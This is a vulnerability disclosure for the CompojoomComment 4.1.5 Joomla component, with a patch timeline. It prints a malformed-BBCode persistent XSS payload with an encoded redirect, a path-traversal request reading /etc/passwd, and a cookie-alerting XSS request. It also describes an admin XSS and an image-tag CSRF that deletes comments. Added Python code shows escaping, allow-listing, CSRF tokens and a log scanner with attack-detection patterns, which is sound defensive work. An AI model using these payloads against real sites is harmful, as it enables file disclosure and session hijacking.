Since the CompojoomComment Hacking Contest is now over, and I was the only winner, I figured I'd go ahead and share my winning entries. These vulnerabilities are present in CompojoomComment 4.1.5, and are all patched in the latest (4.1.7 at the time of this writing).
Malformed BBCode Persistent XSS, #1
Malformed BBCode Persistent XSS, #2
[url=a]b'c='[img][/url]d[color=red]e[/img] onmouseover='location.href=String.fromCharCode(104,116,116,112,58,47,47,106,101,102,102,99,104,97,110,110,101,108,108,46,99,111,109)' style='position:absolute;top:1px;left:1px;width:999em;height:999em' [/color]
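The payload above works because the vulnerable BBCode parser lets a mismatched tag pair carry attacker text into an HTML attribute. The following Python renderer is an added example (not CompojoomComment's code) of the defensive shape that stops this class of bug: every literal character is HTML-escaped, `[url=]` and `[img]` arguments must be absolute http(s) URLs, `[color=]` values must match a narrow pattern, and any closing tag that does not match the innermost open tag is treated as plain text instead of markup. The constant `PAYLOAD` is the advisory's own payload, embedded here as test input.

```python
import html
import re
from urllib.parse import urlparse

# BBCode tags this renderer understands; anything else is kept as literal text.
TAG_RE = re.compile(r"\[(/?)(url|img|color|b|i)(?:=([^\]]*))?\]", re.IGNORECASE)
COLOR_RE = re.compile(r"#[0-9a-fA-F]{3}|#[0-9a-fA-F]{6}|[a-zA-Z]{1,20}")
CLOSE_HTML = {"url": "</a>", "color": "</span>", "b": "</b>", "i": "</em>"}


def safe_url(value):
    """Return the URL if it is an absolute http(s) URL with a host, else None."""
    if value is None:
        return None
    parts = urlparse(value.strip())
    if parts.scheme.lower() not in ("http", "https") or not parts.netloc:
        return None
    return parts.geturl()


def render_bbcode(text):
    """Render BBCode to HTML. Literal text is always escaped and tag arguments
    are validated before use, so mismatched or nested tags can never land
    user-controlled text inside an HTML attribute."""
    tokens = []   # ("text", raw) | ("html", markup) | ("imgopen", raw)
    stack = []    # (tag name, index of its opening token)
    pos = 0
    for m in TAG_RE.finditer(text):
        tokens.append(("text", text[pos:m.start()]))
        pos = m.end()
        closing, name, arg = m.group(1) == "/", m.group(2).lower(), m.group(3)
        if not closing:
            if name == "url":
                url = safe_url(arg)
                if url is None:            # [url=a] is not a URL: leave it as text
                    tokens.append(("text", m.group(0)))
                    continue
                tokens.append(("html", '<a href="%s" rel="nofollow">' % html.escape(url, quote=True)))
            elif name == "color":
                if arg is None or not COLOR_RE.fullmatch(arg):
                    tokens.append(("text", m.group(0)))
                    continue
                tokens.append(("html", '<span style="color:%s">' % arg))
            elif name == "img":
                tokens.append(("imgopen", m.group(0)))   # resolved when [/img] arrives
            else:
                tokens.append(("html", "<em>" if name == "i" else "<b>"))
            stack.append((name, len(tokens) - 1))
        elif not stack or stack[-1][0] != name:
            # Closing tag that does not match the innermost open tag: literal text.
            tokens.append(("text", m.group(0)))
        else:
            _, open_idx = stack.pop()
            if name != "img":
                tokens.append(("html", CLOSE_HTML[name]))
            else:
                body = tokens[open_idx + 1:]
                src = None
                if all(kind == "text" for kind, _ in body):
                    src = safe_url("".join(raw for _, raw in body))
                if src is None:
                    # [img] must wrap a plain http(s) URL; otherwise render the run as text.
                    tokens[open_idx] = ("text", tokens[open_idx][1])
                    tokens.append(("text", m.group(0)))
                else:
                    del tokens[open_idx:]
                    tokens.append(("html", '<img src="%s" alt="">' % html.escape(src, quote=True)))
    tokens.append(("text", text[pos:]))
    # Close whatever is still open so the fragment stays well-formed.
    while stack:
        name, open_idx = stack.pop()
        if name == "img":
            tokens[open_idx] = ("text", tokens[open_idx][1])
        else:
            tokens.append(("html", CLOSE_HTML[name]))
    return "".join(markup if kind == "html" else html.escape(markup, quote=True)
                   for kind, markup in tokens)


# The malformed-BBCode payload quoted in this advisory, used here as test input.
PAYLOAD = ("[url=a]b'c='[img][/url]d[color=red]e[/img] onmouseover='location.href="
           "String.fromCharCode(104,116,116,112,58,47,47,106,101,102,102,99,104,97,110,"
           "110,101,108,108,46,99,111,109)' style='position:absolute;top:1px;left:1px;"
           "width:999em;height:999em' [/color]")

if __name__ == "__main__":
    print(render_bbcode(PAYLOAD))
```

Run against `PAYLOAD`, the output contains a single `<span style="color:red">…</span>` and nothing else in angle brackets: `[url=a]` is rejected because `a` is not a URL, `[/url]` and `[/img]` become text because they do not close the innermost tag, and the `onmouseover` string ends up as escaped text inside the span rather than as an attribute.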
Local File Inclusion
?option=com_comment&no_html=1&component=../../../../../../../../../../../../etc/passwd%00&joscsectionid=0&josctask=ajax_search&comment_id=0&content_id=999&search_keyword=a&search_phrase=any
?option=com_comment&no_html=1&component=<script>alert(document.cookie);</script>&joscsectionid=0&josctask=ajax_search&comment_id=0&content_id=999&search_keyword=a&search_phrase=any
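Both requests abuse the same `component` parameter: once as a file path (traversal plus a `%00` NUL byte to cut off whatever suffix the code appends) and once as reflected markup. The Python below is an added example, not CompojoomComment's code, showing the two sides of the defence: `validate_component` is the server-side check (an identifier matched against an allow-list, never the raw value), and `scan_log` is the detection side, scanning access-log lines for traversal sequences, NUL bytes and script markup in query parameters. `ALLOWED_COMPONENTS`, the log format and the three `SAMPLE_LOG` lines are constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: the component names this site legitimately passes to com_comment.
ALLOWED_COMPONENTS = {"com_content", "com_comment"}
IDENT_RE = re.compile(r"[a-z0-9_]{1,64}")
# Directory traversal sequences and the NUL byte used to truncate the path.
TRAVERSAL_RE = re.compile(r"\.\./|\.\.\\|\x00")
SCRIPT_RE = re.compile(r"<\s*script|javascript:|\bon[a-z]+\s*=", re.IGNORECASE)
# Apache combined-log style line: client ip, then the request line in quotes.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')


def validate_component(value):
    """Server-side check for `component`: an identifier on the allow-list, or None."""
    if value is None or not IDENT_RE.fullmatch(value) or value not in ALLOWED_COMPONENTS:
        return None
    return value


def inspect_request(request_uri):
    """Return a list of findings for one request URI; an empty list means nothing suspicious."""
    findings = []
    params = parse_qs(urlsplit(request_uri).query, keep_blank_values=True)
    component = params.get("component", [None])[0]
    if component is not None and validate_component(component) is None:
        findings.append("component not on allow-list")
    for name, values in params.items():
        for value in values:                  # parse_qs has already percent-decoded these
            if TRAVERSAL_RE.search(value):
                findings.append("path traversal or NUL byte in %s" % name)
            if SCRIPT_RE.search(value):
                findings.append("script or event-handler markup in %s" % name)
    return findings


def scan_log(log_text):
    """Return (client ip, request uri, findings) for every access-log line with findings."""
    flagged = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, uri = m.groups()
        findings = inspect_request(uri)
        if findings:
            flagged.append((ip, uri, findings))
    return flagged


# Constructed sample: one benign ajax_search call, then the two requests from this advisory.
SAMPLE_LOG = """\
203.0.113.7 - - [09/Aug/2010:10:00:01 +0000] "GET /index.php?option=com_comment&no_html=1&component=com_content&joscsectionid=0&josctask=ajax_search&comment_id=0&content_id=999&search_keyword=a&search_phrase=any HTTP/1.1" 200 512
203.0.113.9 - - [09/Aug/2010:10:00:02 +0000] "GET /index.php?option=com_comment&no_html=1&component=../../../../../../../../../../../../etc/passwd%00&joscsectionid=0&josctask=ajax_search&comment_id=0&content_id=999&search_keyword=a&search_phrase=any HTTP/1.1" 200 1337
203.0.113.9 - - [09/Aug/2010:10:00:03 +0000] "GET /index.php?option=com_comment&no_html=1&component=%3Cscript%3Ealert(document.cookie)%3B%3C/script%3E&joscsectionid=0&josctask=ajax_search&comment_id=0&content_id=999&search_keyword=a&search_phrase=any HTTP/1.1" 200 640
"""

if __name__ == "__main__":
    for ip, uri, findings in scan_log(SAMPLE_LOG):
        print(ip, findings)
```

The allow-list check is the real fix: with it in place the value is never used to build a path or echoed into the page, so the traversal and the script tag are both inert. The log scan is the compensating control for an instance that has not been upgraded yet, and it flags only the two requests from 203.0.113.9.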
Administrator Persistent XSS
The Name and Title inputs in the comment edit form aren't sanitized: a double quote in either field breaks out of the attribute and allows XSS in the administrator backend, but only if an admin actually edits that comment...
Comment Deletion CSRF
Embedding the "delete comment" URL in an [img] BBCode results in that comment being deleted whenever an authorized admin loads the page: the admin's browser fetches the image URL with the admin's own session, and the delete action accepts a plain GET with no CSRF token.
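The last two findings share a root cause in the admin side of the component: stored values dropped into attributes unescaped, and a state-changing action reachable by a bare GET. The Python below is an added example (not CompojoomComment's code, and the request, session and comment objects are constructed stand-ins) that shows the hardened admin controller for both: `render_edit_form` escapes every field in attribute context and emits a session-bound token, and `delete_comment` refuses anything that is not a POST carrying that token, which is exactly what an `<img>` fetch can never be. `render_edit_form_vulnerable` is an assumed illustration of the 4.1.5 behaviour for contrast.

```python
import hmac
import html
import secrets


class Session:
    """Constructed stand-in for the admin's server-side session."""
    def __init__(self, admin_id):
        self.admin_id = admin_id
        self.csrf_token = secrets.token_hex(16)   # random, bound to this session only


class Request:
    """Constructed stand-in for an incoming HTTP request."""
    def __init__(self, method, params):
        self.method = method
        self.params = params


def render_edit_form_vulnerable(comment):
    """Assumed shape of the behaviour this advisory describes (not the project's code):
    Name and Title are dropped straight into value="..." attributes."""
    return '<input name="name" value="%s"><input name="title" value="%s">' % (
        comment["name"], comment["title"])


def render_edit_form(comment, session):
    """Hardened form: attribute-context escaping for every stored field, plus the
    session's CSRF token so the save action can be verified on submit."""
    esc = lambda s: html.escape(s, quote=True)
    return (
        '<form method="post" action="index.php?option=com_comment&amp;task=save">'
        '<input type="hidden" name="token" value="%s">'
        '<input name="name" value="%s">'
        '<input name="title" value="%s">'
        '</form>'
    ) % (esc(session.csrf_token), esc(comment["name"]), esc(comment["title"]))


def delete_comment(request, session, comments):
    """Delete handler an <img> tag cannot trigger: an image fetch is a GET and
    carries no token, so it fails both checks before any state changes."""
    if request.method != "POST":
        return 405, "state-changing actions must be POSTed"
    token = str(request.params.get("token", ""))
    # Constant-time comparison against the token issued to this session.
    if not hmac.compare_digest(token.encode(), session.csrf_token.encode()):
        return 403, "missing or invalid CSRF token"
    try:
        cid = int(request.params.get("comment_id", ""))
    except ValueError:
        return 400, "bad comment_id"
    if cid not in comments:
        return 404, "no such comment"
    del comments[cid]
    return 200, "deleted"


def sample_comments():
    """Constructed sample data: comment 1 carries a double quote in its Name field."""
    return {1: {"name": 'Alice" class="x', "title": "Hello"},
            2: {"name": "Bob", "title": "Re: Hello"}}


if __name__ == "__main__":
    session = Session(admin_id=1)
    comments = sample_comments()
    print(render_edit_form_vulnerable(comments[1]))   # quote breaks out of the attribute
    print(render_edit_form(comments[1], session))     # quote is rendered as &quot;
    print(delete_comment(Request("GET", {"comment_id": "1"}), session, comments))
    print(delete_comment(Request("POST", {"comment_id": "1", "token": session.csrf_token}),
                         session, comments))
```

The token is generated per session and compared with `hmac.compare_digest`; rejecting GET outright is what closes the `[img]` vector on its own, and the token then also covers a forged POST from a third-party page.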
- Vulnerabilities Discovered: 4-9 August 2010
- Vendor Notified: 4-9 August 2010
- Vendor Response: 4-9 August 2010
- Update Available: 9 August 2010
- Disclosure: 1 September 2010
The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.